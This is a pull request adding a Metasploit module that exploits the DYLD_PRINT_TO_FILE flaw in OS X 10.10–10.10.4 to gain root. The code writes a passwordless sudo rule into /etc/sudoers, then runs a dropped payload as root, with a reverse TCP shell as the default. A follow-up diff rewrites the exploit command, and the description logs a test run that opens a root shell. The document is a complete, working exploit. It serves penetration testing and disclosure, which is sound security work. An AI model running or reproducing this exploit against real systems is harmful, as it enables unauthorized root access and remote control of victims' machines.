### PR TITLE
OSX 10.10.4 DYLD_PRINT_TO_FILE local root exploit

### DIFF
--- a/modules/exploits/osx/local/dlyd_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
+      'Description'    => %q{
+        In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
+        supported for suid binaries. This allows an arbitrary file write as root.
+      },
+      'Author'         => [
+        'Stefan Esser', # Vulnerability discovery and PoC
+        'joev'          # Copy/paste monkey
+      ],
+      'References'     => [
+        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+      ],
+      'DisclosureDate' => 'Jul 21 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.10-10.10.4', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
+      }
+    ))
+
+    register_options([
+      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def exploit
+    print_status("Writing payload to `#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+    cmd_exec("chmod +x #{payload_file}")
+
+    print_status("Executing exploit at #{payload_file}...")
+    cmd_exec(sploit)
+  end
+
+  def check
+    (ver?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
+    )
+  end
+
+  def sploit
+    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
+      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
+      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+end

--- a/modules/exploits/osx/local/dlyd_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -25,7 +25,8 @@ class Metasploit4 < Msf::Exploit::Local
         'joev'          # Copy/paste monkey
       ],
       'References'     => [
-        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+        ['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html'],
+        ['URL', 'https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/']
       ],
       'DisclosureDate' => 'Jul 21 2015',
       'License'        => MSF_LICENSE,
@@ -43,7 +44,6 @@ class Metasploit4 < Msf::Exploit::Local
     ))
 
     register_options([
-      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
     ])
   end
@@ -69,9 +69,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def sploit
-    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
-      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
-      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+    "/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
   end
 
   def binary_payload


### PR DESCRIPTION
### Verification
- [x] Get a session on osx 10.10.4
- [x] Configure the module, get root
  
  ```
  msf exploit(dlyd_print_to_file_root) > set payload osx/x64/shell_reverse_tcp
  payload => osx/x64/shell_reverse_tcp
  msf exploit(dlyd_print_to_file_root) > set LHOST 192.168.1.2
  LHOST => 192.168.1.2
  msf exploit(dlyd_print_to_file_root) > set LPORT 5555
  LPORT => 5555
  msf exploit(dlyd_print_to_file_root) > set SESSION 1
  SESSION => 1
  msf exploit(dlyd_print_to_file_root) > run
  [*] Started reverse handler on 192.168.1.2:8882
  [*] Writing payload to `/.Trashes/imVacrjS'
  [*] Executing exploit...
  [*] Command shell session 6 opened (192.168.1.2:8882 -> 192.168.1.2:51252) at 2015-07-21 21:48:42 -0500
  [+] Deleted /.Trashes/imVacrjS
  
  3448771354
  JmKHsQtsilGBwNXXTcKgGovWTmRSmLwj
  uQcsIiHfAUikQobTGujIdlHDbowXIKpI
  whoami
  root
  ^Z
  ```
